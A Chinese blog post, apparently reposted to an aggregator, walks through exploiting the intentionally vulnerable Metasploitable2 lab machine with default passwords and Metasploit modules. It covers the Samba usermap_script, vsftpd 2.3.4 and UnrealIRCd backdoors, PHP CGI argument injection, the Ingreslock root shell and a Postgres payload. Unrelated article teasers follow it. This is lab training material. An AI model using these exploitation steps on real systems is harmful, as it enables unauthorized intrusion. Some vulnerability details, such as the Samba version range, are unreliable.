Metasploitable2靶机漏洞复现

一、信息收集

nmap扫描靶机信息

 

二、弱口令

1.系统弱口令

在Kali Linux中使用telnet远程连接靶机

 

 输入账号密码msfadmin即可登录

2.MySQL弱口令

使用mysql -h 靶机IP地址即可连接

 

3.PostgreSQL弱密码登录

输入psql -h 192.168.110.134 -U postgres

密码为postgres

输入\q可以退出

 

4.VNC弱口令

 

二、漏洞利用

一下漏洞利用工具基本均为MSF

1.Samba MS-RPC Shell命令注入

此漏洞允许远程攻击者在易受攻击的Samba服务器上上传和执行恶意代码。它影响了Samba版3.5.0到4.6.4(包括在内),并随Samba 4.6.5的发布进行了修补。

1.使用模块use exploit/multi/samba/usermap_script2.设置参数set rhost 靶机IP地址3.执行run4.执行命令查看目录ls

 

2.vsftpd后门

vsftpd后门漏洞指的是vsftpd(Very Secure FTP Daemon)软件的一个安全漏洞,也被称“Backdoor-VSFTPd”或“vsftpd 2.3.4 Backdoor”。

这个漏洞最初发现于2011年,并影响了vsftpd版本2.3.4。攻击者可以利用该漏洞通过一个特定的用户名进行登录,然后在无需经过认证的情况下获得系统访问权限。

1.MSF中使用以下模块use exploit/unix/ftp/vsftpd_234_backdoor2.设置靶机IPset rhost 靶机IP3.执行并查看runls

 

3.UnreallRCd后门

UnrealIRCd是一种常见的开源IRC服务器软件,被用于构建IRC(Internet Relay Chat)网络。在过去的几年中,UnrealIRCd曾发现过一个后门漏洞,被称为“UnrealIRCd后门”或“Unreal3.2.8.1Backdoor”。

这个后门漏洞于2010年被公开揭露。攻击者利用这个后门可以在受影响的UnrealIRCd服务器上获取远程执行代码的权限,也可以用于执行各种恶意活动,如监控聊天内容、获取敏感信息等。

1.搜索模块search unreal ircd2.搜索payload,并使用一下payloadcmd/unix/bind_perl    3.设置参数set rhost 靶机IP地址4.执行run

 

4.PHP CGI参数注入执行漏洞

PHP CGI 参数注入执行漏洞是一种安全漏洞,它影响在以 CGI 模块方式运行的 Web 服务器上的PHP 程序。该漏洞的根本原因是在使用 CGI 模块处理 PHP 脚本时,未正确过滤和处理用户输入导致的参数注入漏洞。

攻击者利用这个漏洞可以通过特制的 URL 参数注入恶意代码,执行任意的命令或访问系统敏感文件,甚至可能导致服务器完全被入侵控制。

1.搜索模块srach php_cgi2.使用模块并设置参数use exploit/multi/http/php_cgi_arg_injectionset rhost 靶机IP地址3.执行run

 

5.Ingreslock后门

Ingreslock后门程序运行在1524端口,连接到1524端口就能直接获得root权限,经常用于入侵一个暴露的服务器;直接使用telnet命令获取权限

 

6.Postgres共享库代码任意执行

1.搜索模块use exploit/linux/postgres/postgres_payload  2.设置参数set rhost 靶机IPset lhost kali的IP3.执行参数
run

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/63459.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

10. Docker Swarm(一)

目录 1、前言 2、Docker Swarm体系架构 2.1、简单介绍 2.2、体系架构 3、简单使用 3.1、环境准备 3.2、初始化master节点 3.3、建立worker节点 3.4、查看集群的节点信息 3.5、部署应用 3.5.1、创建Dockerfile文件 3.5.2、构建镜像 3.5.3、将镜像上传到Docker仓库 …

web前端之JS

文章目录 介绍一、JS引入到文件1.1 嵌入到HTML文件中1.2 引入本地独立JS文件1.3 引入网络来源文件 二、JS的注释三、JS输出方式四、JS数据类型4.1 判断数据类型 typeof4.2 charAt返回指定位置的字符4.3 concat连接两个字符串4.4 substring从原字符串提取字符串并返回4.4 substr…

Vue输入框或者选择框无效,或者有延迟

问题剖析 使用Vue这种成熟好用的框架,一般出现奇奇怪怪的问题都是因为操作不当导致的,例如没有合理调用组件、组件位置不正确、没有合理定义组件或者变量、样式使用不当等等... 解决方案 如果你也出现了输入框输入东西,但是没有效果…

(二)结构型模式:1、适配器模式(Adapter Pattern)(C++实现示例)

目录 1、适配器模式(Adapter Pattern)含义 2、适配器模式应用场景 3、适配器模式的UML图学习 4、C实现适配器模式的示例 1、适配器模式(Adapter Pattern)含义 将一个接口转换为客户端所期待的接口,从而使两个接口…

最强自动化测试框架Playwright(11)- 录制视频

视频 使用playwright,您可以录制测试视频。 录制视频 视频在测试结束时在浏览器上下文关闭时保存。如果手动创建浏览器上下文,请确保等待 browser_context.close()。 context browser.new_context(record_video_dir"vid…

互联网医院办理|沈阳互联网医院|医疗行业新机遇

互联网医院的办理不仅能为人们带来更便利、高效的医疗服务,更能缓解医疗资源紧张的问题,推动医疗服务的质量和效率提升。在这个充满信息化和科技变革的时代,互联网医院无疑是医疗行业向前迈进的重要一步。 1、提供全天候的医疗服务&#xff1…

重复delete 对象指针后的 异常调用栈怪异 解析

Release版VC6 MFC程序 程序正常退出时得到一个如下异常调用栈:​ 0:000> kb# ChildEBP RetAddr Args to Child WARNING: Frame IP not in any known module. Following frames may be wrong. 00 0019eb94 76124f2f 00c3afc8 0019ebdc 001…

Electron+vue3项目使用SQLite3数据库

SQLite 是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库,这意味着与其他数据库不一样,我们不需要在系统中配置。 就像其他数据库,SQLite 引擎不是一个独立的进程&am…

ChatGPT应用在律师行业需谨慎,南非有律师被它的幻觉误导了!

ChatGPT自去年以来大受欢迎,没想到它这么快会出现在法庭上。 最近,南非约翰内斯堡地区法院审理一个案件时,有律师因为使用ChatGPT生成的虚假参考资料而受到指责。[1] 根据《星期日泰晤士报》的报道,法院判决认为,该名…

IDEA Run SpringBoot程序步骤原理

这个文章不是高深的原理文章,仅仅是接手一个外部提供的阉割版代码遇到过的一个坑,后来解决了,记录一下。 1、IDEA Run 一个SpringBoot一直失败,提示找不到类,但是maven install成功,并且java -jar能成功ru…

pytest之测试用例执行顺序

前言 在unittest框架中,默认按照ACSII码的顺序加载测试用例并执行,顺序为:09、AZ、a~z,测试目录、测试模块、测试类、测试方法/测试函数都按照这个规则来加载测试用例。 而 pytest 中的用例执行顺序与unittest 是不一样的&#…

日常BUG ——乱码

😜作 者:是江迪呀✒️本文关键词:日常BUG、BUG、问题分析☀️每日 一言 :存在错误说明你在进步! 一、问题描述 A系统使用Feign调用B系统时,传递的String字符串,到了B系统中变为了乱…